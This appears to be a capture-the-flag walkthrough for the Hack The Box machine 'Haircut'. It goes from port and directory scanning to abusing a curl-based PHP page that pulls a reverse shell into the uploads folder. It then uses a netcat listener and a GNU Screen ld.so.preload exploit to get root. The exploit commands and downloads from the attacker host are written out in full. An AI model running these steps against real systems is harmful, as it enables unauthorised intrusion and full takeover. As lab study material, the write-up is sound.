Haircut HTB

IP

10.10.10.24

intial nmap scan

sudo nmap -p- --min-rate 10000 10.10.10.24 | cut -d"/" -f1 | tr '\n' ','

we have the following ports open

22,80

Lets run aa more in-depth scan

sudo nmap -sCV -p22,80 -oA nmap_results 10.10.10.24

results

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e9:75:c1:e4:b3:63:3c:93:f2:c6:18:08:36:48:ce:36 (RSA)
|   256 87:00:ab:a9:8f:6f:4b:ba:fb:c6:7a:55:a8:60:b2:68 (ECDSA)
|_  256 b6:1b:5c:a9:26:5c:dc:61:b7:75:90:6c:88:51:6e:54 (ED25519)
80/tcp open  http    nginx 1.10.0 (Ubuntu)
|_http-title:  HTB Hairdresser 
|_http-server-header: nginx/1.10.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.50 seconds

we can see

  • SSH operating

  • HTTP nginx 1.10.0

Let's checkout the web server

Lets run feroxbuster

feroxbuster -u http://10.10.10.24 -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php -o dirs.txt

we do find a couple of interesting directories

301      GET        7l       13w      194c http://10.10.10.24/uploads => http://10.10.10.24/uploads/
200      GET      286l     1220w   226984c http://10.10.10.24/bounce.jpg
200      GET        7l       15w      144c http://10.10.10.24/
200      GET       19l       41w      446c http://10.10.10.24/exposed.php

/exposed.php

when we hit the go button it looks like

Lets catch a request with burp and see if we can find anything interesting

the web app could very well be utilising a curl command, meaning we can alter the request and download a php shell onto the target hopefully

  1. Lets use pentest monkey php reverse-shell and change the ip to our own in the script

  2. lets start a nc listner

nc -lvnp 1234
  1. Lets start a python http server

python3 -m http.server 80
  1. in repeater lets see if we can get the curl command to download our shell.php Since we now there is a /uploads directory this seems like the perfect place to place our shell

  2. Now if we navigate to /uploads/shell.php this will establish the call back to our listener and we have a shell on the system

Lets upgrade our shell

python3 -c "import pty;pty.spawn('/bin/bash')"

we can see within the /var/www/html the exposed.php code

and we indeed can see php it utilising the curl command among among utilising a black list of characters

Lets check the kernel version

uname -r

results

4.4.0-78-generic
  • nothing interesting

Lets see if we can find some SUID bits set

find / -type f -perm /4000 2>/dev/null

this seems like an interesting file to have SUID, after some googling we found an exploit which should create an /etc/ld.so.preload file pointing to a library thatt creates a setuid shell then calls screen again to trigger it

https://github.com/XiphosResearch/exploits/blob/master/screen2root/README.md

we can upload the exploit to our target machine

Now once i ran the exploit on the target we where given strange error, what ill do is break the exploit to 3 parts

Lets compile them, we are just following the original script

gcc -fPIC -shared -ldl -o exploit.so exploit.c
gcc -o rootshell root.c

Now lets transfer tjhese files across

python3 -m http.server 80

from the target machine, within the /tmp directory

wget http://10.10.14.2:80/libhax.so
wget http://10.10.14.2:80/rootshell
wget http://10.10.14.2:80/root.sh

once we have all the files compiled and on target we can execute them

  1. well change directories into /etc , set the umask, and run screen

cd /etc
umask 000
screen -4.5.0 -D -m -L ld.so.preload echo -ne  "\x0a/tmp/libhax.so"
  1. Now by this point, the ld.so.preload should have a reference to /tmp/libhax.so

cat ld.so.preload

Now we can access root by running the screen -ls command

Now ld.so.preload has been cleaned up

  1. if we check the permissions for rootshell its now owned by root and SUID bit is set

now we just need to execute the binary and we have root

rootshell
/tmp/rootshell 
# id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

Last updated